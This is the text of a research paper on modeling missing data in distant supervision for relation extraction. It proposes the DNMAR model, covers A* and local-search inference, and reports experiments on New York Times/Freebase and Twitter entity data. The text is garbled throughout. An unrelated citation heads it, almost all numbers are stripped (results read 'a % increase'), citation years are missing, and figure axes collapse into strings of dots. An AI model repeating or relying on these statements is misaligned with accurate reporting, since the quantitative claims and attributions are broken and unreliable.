Thornton M, Drechsler R, Gunther W. A method for approximate equivalence checking. In: Proceedings of the IEEE International Symposium on Multiple-Valued Logic, Portland, OR. Piscataway: IEEE.
Modeling Missing Data in Distant Supervision for Information Extraction

Alan Ritter, Machine Learning Department, Carnegie Mellon University, rittera@cs.cmu.edu
Luke Zettlemoyer, Mausam, Computer Science & Engineering, University of Washington, {lsz,mausam}@cs.washington.edu
Oren Etzioni, Vulcan Inc., Seattle, WA, orene@vulcan.com

Abstract

Distant supervision algorithms learn information extraction models given only large, readily available databases and text collections. Most previous work has used heuristics for generating labeled data, for example assuming that facts not contained in the database are not mentioned in the text, and that facts in the database must be mentioned at least once. In this paper, we propose a new latent-variable approach that models missing data. This provides a natural way to incorporate side information, for instance modeling the intuition that text will often mention rare entities which are likely to be missing in the database. Despite the added complexity introduced by reasoning about missing data, we demonstrate that a carefully designed local search approach to inference is very accurate and scales to large datasets. Experiments demonstrate improved performance for binary and unary relation extraction when compared to learning with heuristic labels, including on average a % increase in area under the precision-recall curve in the binary case.

Introduction

This paper addresses the issue of missing data (Little and Rubin) in the context of distant supervision.
The goal of distant supervision is to learn to process unstructured data, for instance to extract binary or unary relations from text (Bunescu and Mooney; Snyder and Barzilay; Wu and Weld; Mintz et al.; Collins and Singer), using a large database of propositions as a distant source of supervision. In the case of binary relations, the intuition is that any sentence which mentions a pair of entities (e1 and e2) that participate in a relation, r, is likely to express the proposition r(e1, e2), so we can treat it as a positive training example of r. Figure 1 presents an example of this process.

Figure 1: a small hypothetical database and heuristically labeled training data for the employer relation.
  person          employer
  Bibb Latané     UNC Chapel Hill
  Tim Cook        Apple
  Susan Wojcicki  Google
  True positive: "Bibb Latané, a professor at the University of North Carolina at Chapel Hill, published the theory in ..."
  False positive: "Tim Cook praised Apple's record revenue..."
  False negative: "John P. McNamara, a professor at Washington State University's Department of Animal Sciences..."

One question which has received little attention in previous work is how to handle the situation where information is missing, either from the text corpus or from the database. As an example, suppose the pair of entities (John P. McNamara, Washington State University) is absent from the employer relation. In this case, the sentence in Figure 1 (and others which mention the entity pair) is effectively treated as a negative example of the relation. This is an issue of practical concern, as most databases of interest are highly incomplete; this is the reason we need to extend them by extracting information from text in the first place.

We need to be cautious in how we handle missing data in distant supervision, because this is a case where data is not missing at random (NMAR). Whether a proposition is observed or missing in the text or database depends heavily on its truth value: given that it is true we have some chance to observe it; however, we do not observe those which are false. To address this challenge, we propose a joint model of extraction from text and the process by which propositions are observed or missing in both the database and the text. Our approach provides a natural way to incorporate side information in the form of a missing data model. For instance, popular entities such as Barack Obama already have good coverage in Freebase, so new extractions are more likely to be errors than those involving rare entities with poor coverage.

Our approach to missing data is general and can be combined with various IE solutions. As a proof of concept, we extend MultiR (Hoffmann et al.), a recent model for distantly supervised information extraction, to explicitly model missing data. These extensions complicate the MAP inference problem which is used as a subroutine in learning. This motivated us to explore a variety of approaches to inference in the joint extraction and missing data model. We explore both exact inference based on A* search and efficient approximate inference using local search. Our experiments demonstrate that with a carefully designed set of search operators, local search produces optimal solutions in most cases.
Experimental results demonstrate large performance gains over the heuristic labeling strategy on both binary relation extraction and weakly supervised named entity categorization. For example, our model obtains a % increase in area under the precision-recall curve on the sentence-level relation extraction task.

Related work

There has been much interest in distantly supervised (also referred to as weakly supervised) training of relation extractors using databases. For example, Craven and Kumlien build a heuristically labeled dataset, using the Yeast Protein Database to label PubMed abstracts with the subcellular-localization relation. Wu and Weld heuristically annotate Wikipedia articles with facts mentioned in the infoboxes, enabling automated infobox generation for articles which do not yet contain them. Benson et al. use a database of music events taking place in New York City as a source of distant supervision to train event extractors for Twitter. Mintz et al. used a set of relations from Freebase as a distant source of supervision to learn to extract information from Wikipedia. Riedel et al., Hoffmann et al., and Surdeanu et al. presented a series of models casting distant supervision as a multiple-instance learning problem (Dietterich et al.).

Recent work has begun to address the challenge of noise in heuristically labeled training data generated by distant supervision, and has proposed a variety of strategies for correcting erroneous labels. Takamatsu et al. present a generative model of the labeling process, which is used as a pre-processing step for improving the quality of labels before training relation extractors. Independently, Xu et al. analyze a random sample of sentences from the New York Times, demonstrating that most entity pairs expressing a Freebase relation correspond to false negatives. They apply pseudo-relevance feedback to add missing entries to the knowledge base before applying the MultiR model (Hoffmann et al.). Min et al. extend the MIML model of Surdeanu et al. using a semi-supervised approach assuming a fixed proportion of true positives for each entity pair.

The Min et al. approach is perhaps the most closely related of the recent approaches to distant supervision. However, there are a number of key differences: (1) they impose a hard constraint on the proportion of true positive examples for each entity pair, whereas we jointly model relation extraction and missing data in the text and KB; (2) they only handle the case of missing information in the database and not in the text; (3) their model, based on Surdeanu et al., uses hard discriminative EM to tune parameters, whereas we use perceptron-style updates; (4) we evaluate various inference strategies for exact and approximate inference.

The issue of missing data has been extensively studied in the statistical literature (Little and Rubin; Gelman et al.). Most methods for handling missing data assume that variables are missing at random (MAR): whether a variable is observed does not depend on its value. In situations where the MAR assumption is violated (for example, distantly supervised information extraction), ignoring the missing data mechanism will introduce bias. In this case it is necessary to jointly model the process of interest (e.g., information extraction) in addition to the missing data mechanism.

Another line of related work is iterative semantic bootstrapping (Brin; Agichtein and Gravano).
Carlson et al. exploit constraints between relations to reduce semantic drift in the bootstrapping process; such constraints are potentially complementary to our approach of modeling missing data.

A latent variable model for distantly supervised relation extraction

In this section we review the MultiR model (due to Hoffmann et al.) for distant supervision in the context of extracting binary relations. This model is extended to handle missing data in the following section. We focus on binary relations to keep the discussion concrete; unary relation extraction is also possible.

Given a set of sentences, s = s_1, s_2, ..., s_n, which mention a specific pair of entities (e1 and e2), our goal is to correctly predict which relation is mentioned in each sentence, or "NA" if none of the relations under consideration is mentioned. Unlike the standard supervised learning setup, we do not observe the latent sentence-level relation mention variables, z = z_1, z_2, ..., z_n; these variables indicate which relation is mentioned between e1 and e2 in each sentence. Instead, we only observe aggregate binary variables for each relation, d = d_1, d_2, ..., d_k, which indicate whether the proposition r_j(e1, e2) is present in the database (Freebase). Of course, the question which arises is: how do we relate the aggregate-level variables, d_j, to the sentence-level relation mentions, z_i? A sensible answer to this question is a simple deterministic-OR function. The deterministic OR states that if there exists at least one i such that z_i = j, then d_j = 1. For example, if at least one sentence mentions that "Barack Obama was born in Honolulu", then that fact is true in aggregate; if none of the sentences mentions the relation, then the fact is assumed false. The model also makes the converse assumption: if Freebase contains the relation BirthLocation(Barack Obama, Honolulu), then we must extract it from at least one sentence. A summary of this model, which is due to Hoffmann et al., is presented in the figure below.

Figure: the MultiR model (Hoffmann et al.). Sentences s_1, ..., s_n are connected to relation mention variables z_1, ..., z_n by local extractors with P(z_i = r | s_i) ∝ exp(θ · f(s_i, r)); the mentions are connected to the aggregate relation variables d_1, ..., d_k (born-in, lived-in, children, etc., for an entity pair such as (Barack Obama, Honolulu)) through a deterministic OR.

Learning

To learn the parameters of the sentence-level relation mention classifier, θ, we maximize the likelihood of the facts observed in Freebase conditioned on the sentences in our text corpus:

  θ* = argmax_θ p(d | s; θ) = argmax_θ ∏_{e1,e2} Σ_z p(z, d | s; θ)

Here the conditional likelihood of a given entity pair is defined as follows:

  p(z, d | s; θ) = ∏_{i=1..n} φ(z_i, s_i; θ) × ∏_{j=1..k} ω(z, d_j)
                 = ∏_{i=1..n} exp(θ · f(z_i, s_i)) × ∏_{j=1..k} 1[¬d_j ⊕ ∃i: z_i = j]

where 1[x] is an indicator that takes the value 1 if x is true and 0 otherwise, the ω(z, d_j) factors are hard constraints corresponding to the deterministic-OR function, and f(z_i, s_i) is a vector of features extracted from sentence s_i and relation z_i.

An iterative gradient-ascent-based approach is used to tune θ using a latent-variable perceptron-style additive update scheme (Collins; Liang et al.; Zettlemoyer and Collins). The gradient of the conditional log-likelihood, for a single pair of entities, e1 and e2, is as follows:

  ∂ log p(d | s; θ) / ∂θ = E_{p(z | s, d; θ)}[ Σ_j f(s_j, z_j) ] − E_{p(z, d | s; θ)}[ Σ_j f(s_j, z_j) ]

For details, see Koller and Friedman.
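To make the structure of this likelihood concrete, the following sketch shows the two kinds of factors it combines: the sentence-level log-linear factor φ and the hard deterministic-OR factor ω. It is an illustrative C++ fragment (function names and data layout are assumptions), not the MultiR implementation.

```cpp
// Illustrative sketch of the two factor types in the MultiR likelihood:
// phi(z_i, s_i) = exp(theta . f(s_i, z_i)) at the sentence level, and the
// hard deterministic-OR factors omega(z, d_j) at the aggregate level.
#include <cstddef>
#include <vector>

// log phi(z_i = r, s_i; theta) = theta . f(s_i, r); the feature vector is
// assumed to be computed elsewhere.
double log_phi(const std::vector<double>& theta, const std::vector<double>& f_si_r) {
    double dot = 0.0;
    for (std::size_t k = 0; k < theta.size(); ++k) dot += theta[k] * f_si_r[k];
    return dot;
}

// omega(z, d_j): 1 if d_j agrees with the deterministic OR of the mentions
// (d_j = 1 exactly when some z_i = j), 0 otherwise.
bool omega(const std::vector<int>& z, int j, bool d_j) {
    bool mentioned = false;
    for (int zi : z) mentioned = mentioned || (zi == j);   // zi = -1 encodes "NA"
    return mentioned == d_j;
}
```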
These expectations are too difficult to compute in practice, so instead they are approximated as maximizations. Computing this approximation to the gradient requires solving two inference problems corresponding to the two maximizations:

  z*_DB = argmax_z p(z | s, d; θ)
  z*    = argmax_z p(z, d | s; θ)

The MAP solution for the second term is easy to compute: because d and z are deterministically related, we can simply find the highest-scoring relation, r, for each sentence, s_i, according to the sentence-level factors, φ, independently. The first term is more difficult, however, as it requires finding the best assignment to the sentence-level hidden variables z = z_1 ... z_n conditioned on the observed sentences and the facts in the database. Hoffmann et al. show how this reduces to a well-known weighted edge-cover problem which can be solved exactly in polynomial time.

Modeling missing data

The model presented in the previous section makes two assumptions which correspond to hard constraints:
1. If a fact is not found in the database, it cannot be mentioned in the text.
2. If a fact is in the database, it must be mentioned in at least one sentence.

These assumptions drive the learning; however, if information is missing from either the text or the database, this leads to errors in the training data (false positives and false negatives, respectively). In order to gracefully handle the problem of missing data, we propose to extend the model by splitting the aggregate-level variables, d, into two parts: t, which represents whether a fact is mentioned in the text (in at least one sentence), and d′, which represents whether the fact is mentioned in the database. We introduce pairwise potentials ψ(t_j, d_j) which penalize disagreement between t_j and d_j, that is:

  ψ(t_j, d_j) = −α_MIT  if t_j = 0 and d_j = 1
                −α_MID  if t_j = 1 and d_j = 0
                0       otherwise

where α_MIT (missing in text) and α_MID (missing in database) are parameters of the model which can be understood as penalties for missing information in the text and the database, respectively. We refer to this model as DNMAR (for distant supervision with data not missing at random). A graphical model representation is presented in the figure below.

Figure: the DNMAR model. Sentences s_1, ..., s_n and relation mentions z_1, ..., z_n as in MultiR, but the aggregate level is split into variables t_1, ..., t_k (fact mentioned in the text) and d_1, ..., d_k (fact mentioned in the database), connected by the pairwise ψ potentials.

This model can be understood as relaxing the two hard constraints mentioned above into soft constraints. As we show in the experiments, simply relaxing these hard constraints into soft constraints and setting the two parameters α_MIT and α_MID by hand on development data results in a large improvement in precision at comparable recall over MultiR on two different applications of distant supervision: binary relation extraction and named entity categorization. Inference in this model becomes more challenging, however, because the constrained inference problem no longer reduces to a weighted edge-cover problem as before. In 'MAP inference' below, we present an inference technique for the new model which is time and memory efficient and almost always finds an exact MAP solution.

The learning proceeds analogously to what was described above, with the exception that we now maximize over the additional aggregate-level hidden variables t which have been introduced. As before, MAP inference is a subroutine in learning, both for the unconstrained case corresponding to the second term (which is again trivial to compute), and for the constrained case, which is more challenging as it no longer reduces to a weighted edge-cover problem.
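Concretely, the effect of these soft constraints on a full assignment z can be sketched as follows: facts extracted from the text but absent from the database incur the α_MID penalty, and facts in the database that are never extracted incur the α_MIT penalty. This is an illustrative fragment under the notation above (names such as aggregate_penalty are assumptions), not the authors' code.

```cpp
// Sketch of the aggregate DNMAR penalty for an assignment z: t_j follows
// deterministically from z, and disagreement with the database variable d_j
// is penalized by alpha_MID or alpha_MIT.
#include <cstddef>
#include <vector>

double aggregate_penalty(const std::vector<int>& z,        // z_i = relation index, -1 for "NA"
                         const std::vector<bool>& in_db,   // d_j: fact j present in Freebase
                         double alpha_mit, double alpha_mid) {
    std::vector<bool> in_text(in_db.size(), false);        // t_j: fact j extracted from some sentence
    for (int zi : z)
        if (zi >= 0) in_text[zi] = true;
    double penalty = 0.0;
    for (std::size_t j = 0; j < in_db.size(); ++j) {
        if (in_text[j] && !in_db[j]) penalty -= alpha_mid; // extracted but missing in the database
        if (!in_text[j] && in_db[j]) penalty -= alpha_mit; // in the database but missing in the text
    }
    return penalty;                                        // added to the sum of sentence-level scores
}
```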
MAP inference

The only difference in the new inference problem is the addition of t; z and t are deterministically related, so we can simply find a MAP assignment to z, from which t follows. The resulting inference problem can be viewed as optimization under soft constraints, where the objective includes a penalty, −α_MID, for each fact not in Freebase which is extracted from the text, and an effective reward, α_MIT, for extracting a fact which is contained in Freebase. The solution to the MAP inference problem is the value of z which maximizes the following objective:

  z*_DB = argmax_z p(z | s, d; θ, α)
        = argmax_z Σ_{i=1..n} θ · f(z_i, s_i)
          + Σ_{j=1..k} ( α_MIT · 1[d_j ∧ ∃i: z_i = j] − α_MID · 1[¬d_j ∧ ∃i: z_i = j] )      (1)

Whether we choose to set the parameters α_MIT and α_MID to fixed values or to incorporate side information through a missing data model (see 'Incorporating side information'), inference becomes more challenging than in the model where facts observed in Freebase are treated as hard constraints; the hard constraints are equivalent to setting α_MID = α_MIT = ∞. We now present exact and approximate approaches to inference. Standard search methods such as A* and branch and bound have high computation and memory requirements and are therefore only feasible on problems with few variables; they are, however, guaranteed to find an optimal solution. Approximate methods scale to large problem sizes, but we lose the guarantee of finding an optimal solution. (Each entity pair defines an inference problem whose number of variables is equal to the number of sentences which mention the pair.) After showing how to find guaranteed exact solutions for small problem sizes, we present an inference algorithm based on local search which is empirically shown to find optimal solutions in almost every case, verified by comparing its solutions to those found by A*.

A* search

We cast exact MAP inference in the DNMAR model as an application of A* search. Each partial hypothesis, h, in the search space corresponds to a partial assignment of the first m variables in z; to expand a hypothesis, we generate k new hypotheses, where k is the total number of relations. Each new hypothesis h′ contains the same partial assignment to z_1, ..., z_m as h, with each h′ having a different value of z_{m+1} = r. A* operates by maintaining a priority queue of hypotheses to expand, with each hypothesis' priority determined by an admissible heuristic. The heuristic represents an upper bound on the score of the best solution consistent with h's partial variable assignment under the objective from Equation (1). In general, a tighter upper bound corresponds to a better heuristic and faster solutions. To upper bound our objective, we start with the φ(z_i, s_i) factors from the partial assignment. Unassigned variables (i > m) are set to their maximum possible value, max_r φ(r, s_i), independently. Next, to account for the effect of the aggregate ψ(t_j, d_j) factors on the unassigned variables, we consider independently changing each unassigned z_i variable for each ψ(t_j, d_j) factor to improve the overall score. This approach can lead to inconsistencies, but it provides a good upper bound on the best possible solution with a partial assignment to z_1, ..., z_m.

Local search

While A* is guaranteed to find an exact solution, its time and memory requirements prohibit its use on large problems involving many variables. As a more scalable alternative we propose a greedy hill-climbing method (Russell et al.), which starts with a full assignment to z and repeatedly moves to the best neighboring solution z′ according to the objective in Equation (1).
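The overall hill-climbing loop can be sketched as below; objective(z) stands for Equation (1) and neighbors(z) for the moves generated by the search operators described in the next paragraphs. All names are assumptions, and the fragment is an illustrative sketch rather than the authors' implementation.

```cpp
// Greedy hill climbing with random restarts for the MAP problem in Equation (1).
// objective(z) and neighbors(z) are assumed helpers: the former combines the
// sentence-level scores with the aggregate alpha_MIT / alpha_MID terms, the
// latter enumerates the candidate moves defined by the search operators.
#include <cstddef>
#include <random>
#include <vector>

double objective(const std::vector<int>& z);
std::vector<std::vector<int>> neighbors(const std::vector<int>& z);
std::vector<int> random_assignment(std::size_t n, int num_relations, std::mt19937& rng);

std::vector<int> map_local_search(std::size_t n, int num_relations, int restarts) {
    std::mt19937 rng(0);
    std::vector<int> best;
    double best_score = -1e300;
    for (int r = 0; r < restarts; ++r) {
        std::vector<int> z = random_assignment(n, num_relations, rng);
        double score = objective(z);
        bool improved = true;
        while (improved) {                       // repeat until no neighbor improves the objective
            improved = false;
            std::vector<int> best_nb = z;
            double best_nb_score = score;
            for (const std::vector<int>& cand : neighbors(z)) {
                double s = objective(cand);
                if (s > best_nb_score) { best_nb_score = s; best_nb = cand; improved = true; }
            }
            z = best_nb;                         // move to the best neighboring solution
            score = best_nb_score;
        }
        if (score > best_score) { best_score = score; best = z; }
    }
    return best;                                 // best local maximum over all restarts
}
```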
as a more scal- able alternative we propose a greedy hill climbing method (russell et al., ), which starts with a full assignment to z, and repeatedly moves to the best neighboring solution z′ according to the objective in number of variables is equal to the number of sentences which mention the pair. equation . the neighborhood of z is defined by a set of search operators. if none of the neighboring solutions has a higher score, then we have reached a (local) maximum at which point the algorithm ter- minates with the current solution which may or may not correspond to a global maximum. this process is repeated using a number of random restarts, and the best local maximum is returned as the solution. search operators: we start with a standard search operator, which considers changing each relation-mention variable, zi, individually to maxi- mize the overall score. at each iteration, all zis are considered, and the one which produces the largest improvement to the overall score is changed to form the neighboring solution, z′. unfortunately, this definition of the solution neighborhood is prone to poor local optima because it is often required to traverse many low scoring states before changing one of the aggregate variables, tj, and achieving a higher score from the associated aggregate factor, ψ(tj,dj). for example, consider a case where the proposition r(e ,e ) is not in freebase, but is men- tioned many times in the text, and imagine the cur- rent solution contains no mention zi = r. any neighboring solution which assigns a mention to r will include the penalty αmid, which could out- weigh the benefit from changing any individual zi to r: φ(r,si) −φ(zi,si). if multiple mentions were changed to r however, together they could outweigh the penalty for extracting a fact not in freebase, and produce an overall higher score. to avoid the problem of getting stuck in local optima, we propose an additional search operator which considers changing all variables, zi, which are currently assigned to a specific relation r, to a new relation r′, resulting in an additional (k − ) possible neighbors, in addition to the n × (k − ) neighbors which come from the standard search op- erator. this aggregate-level search operator allows for more global moves which help to avoid local op- tima, similar to the type-level sampling approach for mcmc (liang et al., ). at each iteration, we consider all n × (k − ) + (k− ) possible neighboring solutions generated by both search operators, and pick the one with biggest overall improvement, or terminate the algorithm if no improvements can be made over the current so- lution. random restarts were used for each infer- ence problem. we found this approach to almost al- ways find an optimal solution. in over , prob- lems with or fewer variables from the new york times dataset used in section , an optimal solu- tion was missed in only cases which was verified by comparing against optimal solutions found using a*. without including the aggregate-level search operator, local search almost always gets stuck in a local maximum. incorporating side information in section , we relaxed the hard constraints made by multir, which allows for missing information in either the text or database, enabling errors in the distantly supervised training data to be naturally corrected as a side-effect of learning. 
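a minimal version of the greedy hill-climbing search described in the previous subsection, with both the mention-level and the aggregate-level operators, might look as follows (illustrative names; a practical implementation would score candidate moves incrementally rather than re-scoring the full assignment each time):

```python
import numpy as np

def score(z, phi, d, alpha_mit, alpha_mid):
    """objective: sentence-level factors plus the aggregate soft-constraint terms."""
    n, k = phi.shape
    t = np.zeros(k, dtype=bool)
    t[np.unique(z)] = True
    aggregate = alpha_mit * (t & (d == 1)).sum() - alpha_mid * (t & (d == 0)).sum()
    return phi[np.arange(n), z].sum() + aggregate

def hill_climb(phi, d, alpha_mit, alpha_mid, n_restarts=10, seed=0):
    """greedy local search using (1) single-mention moves and (2) aggregate moves
    that retag every mention of one relation, with random restarts."""
    rng = np.random.default_rng(seed)
    n, k = phi.shape
    best_z, best_total = None, -np.inf
    for _ in range(n_restarts):
        z = rng.integers(k, size=n)                      # random initial assignment
        current = score(z, phi, d, alpha_mit, alpha_mid)
        improved = True
        while improved:
            improved = False
            best_move, best_gain = None, 0.0
            for i in range(n):                           # operator 1: change a single z_i
                for r in range(k):
                    if r == z[i]:
                        continue
                    cand = z.copy()
                    cand[i] = r
                    gain = score(cand, phi, d, alpha_mit, alpha_mid) - current
                    if gain > best_gain:
                        best_move, best_gain = cand, gain
            for r in np.unique(z):                       # operator 2: retag all mentions of r
                for r_new in range(k):
                    if r_new == r:
                        continue
                    cand = z.copy()
                    cand[z == r] = r_new
                    gain = score(cand, phi, d, alpha_mit, alpha_mid) - current
                    if gain > best_gain:
                        best_move, best_gain = cand, gain
            if best_move is not None:                    # take the single best improving move
                z, current, improved = best_move, current + best_gain, True
        if current > best_total:
            best_z, best_total = z.copy(), current
    return best_z, best_total
```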
we made the simplifying assumption, however, that all facts are equally likely to be missing from the text or database, which is encoded in the choice of fixed parameters αmit, and αmid. is it possible to im- prove performance by incorporating side informa- tion in the form of a missing data model (little and rubin, ), taking into account how likely each fact is to be observed in the text and the database conditioned on its truth value? in our setting, the missing data model corresponds to choosing the val- ues of αmit and αmid dynamically based on the en- tities and relations involved. popular entities: consider two entities: barack obama, the th president of the united states, and donald parry, a professional rugby league footballer of the s. since obama is much more well- known than parry, we wouldn’t be very surprised to see information missing from freebase about parry, but it would seem odd if true propositions were miss- ing about obama. we can encode these intuitions by choosing entity-specific values of αmid: α (e ,e ) mid = −γ min (c(e ),c(e )) where c(ei) is the number of times ei appears in freebase, which is used as an estimate of its cov- erage. well aligned relations: given that a pair of en- tities, e and e , participating in a freebase relation, http://en.wikipedia.org/wiki/donald_ parry r, appear together in a sentence si, the chance that si expresses r varies greatly depending on r. for example, if a sentence mentions a pair of entities which participate in both the countrycapitol relation and the locationcontains relation (for example moscow and russia), it is more likely that the a random sentence will express locationcon- tains than countrycapitol. we can encode this preference for matching cer- tain relations over others by setting αrmit on a per-relation basis. we choose a different value of αrmit for each relation based on quick inspec- tion of the data, and estimating the number of true positives. relations such as contains, place lived, and nationality which contain a large number of true positive matches are assigned a large value of αrmit = γlarge, those with a medium number such as capitol, place of death and administrative divisions were assigned a medium value γmedium, and those relations with few matches were assigned a small value γsmall. these parameters were tuned on held out development data. experiments in section , we presented a scalable approach to inference in the dnmar model which almost al- ways finds an optimal solution. of course the real question is: does modeling missing data improve performance at extracting information from text? in this section we present experimental results showing large improvements in both precision and recall on two distantly supervised learning tasks: binary rela- tion extraction and named entity categorization. . binary relation extraction for the sake of comparison to previous work we evaluate performance on the new york times text, features and freebase relations developed by riedel et. al. ( ) which was also used by hoffmann et. al. ( ). this dataset is constructed by extracting named entities from . million new york times ar- ticles, which are then match against entities in free- base. sentences which contain pairs of entities par- ticipating in one or more relations are then used as training examples for those relations. 
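the entity- and relation-specific penalties described above can be sketched as follows; the γ constants and the assignment of relations to the large/medium/small bins are placeholders standing in for the values chosen by inspection and tuned on held-out development data, and the α values are treated as non-negative penalty magnitudes plugged into the pairwise potentials ψ defined earlier:

```python
# placeholder penalty scales; in the paper these were tuned on held-out development data
GAMMA_ENTITY = 0.01
GAMMA_MIT = {"large": 3.0, "medium": 1.5, "small": 0.5}

# illustrative binning of relations by how often an entity-pair match truly expresses
# the relation; the bins follow the description above, the exact paths are assumptions
RELATION_BIN = {
    "/location/location/contains": "large",
    "/people/person/place_lived": "large",
    "/people/person/nationality": "large",
    "/location/country/capital": "medium",
    "/people/deceased_person/place_of_death": "medium",
    "/location/country/administrative_divisions": "medium",
}

def alpha_mid_for_pair(e1, e2, freebase_count):
    """entity-specific 'missing in database' penalty: extracting a fact that freebase
    lacks is penalized more when both entities are well covered (popular)."""
    coverage = min(freebase_count.get(e1, 0), freebase_count.get(e2, 0))
    return GAMMA_ENTITY * coverage

def alpha_mit_for_relation(relation):
    """relation-specific 'missing in text' penalty, binned by how often a matched
    sentence truly expresses the relation."""
    return GAMMA_MIT[RELATION_BIN.get(relation, "small")]
```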
the sentence- level features include word sequences appearing in context with the pair of entities, in addition to part of speech sequences, and dependency paths from the malt parser (nivre et al., ). . . baseline to evaluate the effect of modeling missing data in distant supervision, we compare against the mul- tir model for distant supervision (hoffmann et al., ), a state of the art approach for binary rela- tion extraction which is the most similar previous work, and models facts in freebase as hard con- straints disallowing the possibility of missing infor- mation in either the text or the database. to make our experiment as controlled as possible and rule- out the possibility of differences in performance due to implementation details, we compare against our own re-implementation of multir which reproduces hoffmann et. al.’s performance, and shares as much code as possible with the dnmar model. . . experimental setup we evaluate binary relation extraction using two evaluations. we first evaluate on a sentence-level extraction task using a manually annotated dataset provided by hoffmann et. al. ( ). this dataset consists of sentences paired with human judgments on whether each expresses a specific relation. sec- ondly, we perform an automatic evaluation which compares propositions extracted from text against held-out data from freebase. . . results sentential extraction: figure presents preci- sion and recall curves for the sentence-level relation extraction task on the same manually annotated data presented by hoffmann et. al. ( ). by explic- itly modeling the possibility of missing information in both the text and the database we achieve a % increase in area under the precision recall curve. in- corporating additional side information in the form of a missing data model, as described in section , produces even better performance, yielding a % increase over the baseline in area under the curve. we also compare against the system described by xu et. al. ( ) (hereinafter called xu ). to do this, we trained our implementation of multir on http://raphaelhoffmann.com/mr/ . . . . . . . . . . . . recall p re ci si o n multir xu dnmar dnmar* figure : overall precision and recall at the sentence-level extraction task comparing against human judgments. dnmar∗ incorporates side- information as discussed in section . the labels predicted by their pseudo-relevance feed- back model. the differences between each pair of systems, except dnmar and xu , is significant with p-value less than . according to a paired t- test assuming a normal distribution. per-relation precision and recall curves are pre- sented in figure . for certain relations, for instance /location/us state/capital, there simply isn’t enough overlap between the information contained in free- base and facts mentioned in the text to learn any- thing useful. for these relations, entity pair matches are unlikely to actually express the relation; for in- stance, in the following sentence from the data: nhpf , which has its louisiana office in baton rouge , gets the funds ... although baton rouge is the capital of louisiana, the /location/us state/capital relation is not ex- pressed in this sentence. another interesting ob- servation which we can make from figure , is that the benefit from modeling missing data we thank wei xu for making this data available. dnmar has a . % increase in auc over xu , though this difference is not significant according to a paired t-test. dnmar* achieves a % increase in auc over xu which is significant. . . . 
. . . . . . . . . . . recall p re ci si o n multir dnmar dnmar* figure : aggregate-level automatic evaluation comparing against held-out data from freebase. dnmar∗ incorporates side-information as dis- cussed in section . varies from one relation to another. some re- lations, for instance /people/person/place of birth, have relatively good coverage in both freebase and the text, and therefore we do not see as much gain from modeling missing data. other rela- tions, such as /location/location/contains, and /peo- ple/person/place lived have poorer coverage making our missing data model very beneficial. aggregate extraction: following previous work, we evaluate precision and recall against held- out data from freebase in figure . as mentioned by mintz et. al. ( ), this automatic evaluation un- derestimates precision because many facts correctly extracted from the text are missing in the database and therefore judged as incorrect. riedel et. al. ( ) further argues that this evaluation is biased because frequent entity pairs are more likely to con- tain facts in freebase, so systems which rank extrac- tions involving popular entities higher will achieve better performance independently of how accurate their predictions are. indeed in figure we see that the precision of our system which models missing data is generally lower than the system which as- sumes no data is missing from freebase, although we do roughly double the recall. by better modeling . . . . . . . . . . . . business_company_founders recall p re ci si o n . . . . . . . . . . . . business_person_company recall p re ci si o n . . . . . . . . . . . . location_country_administrative_divisions recall p re ci si o n . . . . . . . . . . . . location_country_capital recall p re ci si o n . . . . . . . . . . . . location_location_contains recall p re ci si o n . . . . . . . . . . . . location_neighborhood_neighborhood_of recall p re ci si o n . . . . . . . . . . . . location_us_state_capital recall p re ci si o n . . . . . . . . . . . . people_deceased_person_place_of_death recall p re ci si o n . . . . . . . . . . . . people_person_children recall p re ci si o n . . . . . . . . . . . . people_person_nationality recall p re ci si o n . . . . . . . . . . . . people_person_place_lived recall p re ci si o n . . . . . . . . . . . . people_person_place_of_birth recall p re ci si o n figure : per-relation precision and recall on the sentence-level relation extraction task. the dashed line corresponds to multir, dnmar is the solid line, and dnmar*, which incorporates side-information, is represented by the dotted line. missing data we achieve lower precision on this au- tomatic held-out evaluation as the system using hard constraints is explicitly trained to predict facts which occur in freebase (not those which are mentioned in the text but unlikely to appear in the database). . named entity categorization as mentioned previously, the problem of missing data in distant (weak) supervision is a very general issue; so far we have investigated this problem in the context of extracting binary relations using distant supervision. we now turn to the problem of weakly supervised named entity recognition (collins and singer, ; talukdar and pereira, ). . . experimental setup to demonstrate the effect of modeling missing data in the distantly supervised named entity cate- gorization task, we adapt the multir and dnmar models to the twitter named entity categorization dataset which was presented by ritter et. al. ( ). 
the models described so far are applied unchanged: rather than modeling a set of relations in freebase between a pair of entities, e and e , we now model a set of possible freebase categories associated with a single entity e. this is a natural extension of dis- tant supervision from binary to unary relations. the unlabeled data and features described by ritter et. al. ( ) are used for training the model, and their manually annotated twitter named entity dataset is used for evaluation. . . results precision and recall at weakly supervised named entity categorization comparing multir against dn- mar is presented in figure . we observe substan- tial improvement in precision at comparable recall by explicitly modeling the possibility of missing in- formation in the text and database. the missing data model leads to a % increase in area under the precision-recall curve (from . to . ), but still falls short of the results presented by ritter et. al. ( ). intuitively this makes sense, because the model used by ritter et. al. is based on latent dirich- let allocation which is better suited to this highly am- biguous unary relation data. . . . . . . . . . . . . recall p re ci si o n ner_multir ner_dnmar figure : precision and recall at the named entity categorization task conclusions in this paper we have investigated the problem of missing data in distant supervision; we introduced a joint model of information extraction and miss- ing data which relaxes the hard constraints used in previous work to generate heuristic labels, and pro- vides a natural way to incorporate side information through a missing data model. efficient inference breaks in the new model, so we presented an ap- proach based on a* search which is guaranteed to find exact solutions, however exact inference is not computationally tractable for large problems. to ad- dress the challenge of large problem sizes, we pro- posed a scalable inference algorithm based on local search, which includes a set of aggregate search op- erators allowing for long-distance jumps in the so- lution space to avoid local maxima; this approach was experimentally demonstrated to find exact so- lutions in almost every case. finally we evaluated the performance of our model on the tasks of binary relation extraction and named entity categorization showing large performance gains in each case. in future work we would like to apply our ap- proach to modeling missing data to additional mod- els, for instance the model of surdeanu et. al. ( ) and ritter et. al. ( ), and also explore new miss- ing data models. acknowledgements the authors would like to thank dan weld, chris quirk, raphael hoffmann and the anonymous re- viewers for helpful comments. thanks to wei xu for providing data. this research was supported in part by onr grant n - - - , darpa contract fa - - c- , a gift from google, a gift from vulcan inc., and carried out at the univer- sity of washington’s turing center. references eugene agichtein and luis gravano. . snowball: extracting relations from large plain-text collections. in proceedings of the fifth acm conference on digital libraries. edward benson, aria haghighi, and regina barzilay. . event discovery in social media feeds. in pro- ceedings of acl. sergey brin. . extracting patterns and relations from the world wide web. in the world wide web and databases. razvan bunescu and raymond mooney. . learning to extract relations from the web using minimal super- vision. in acl. 
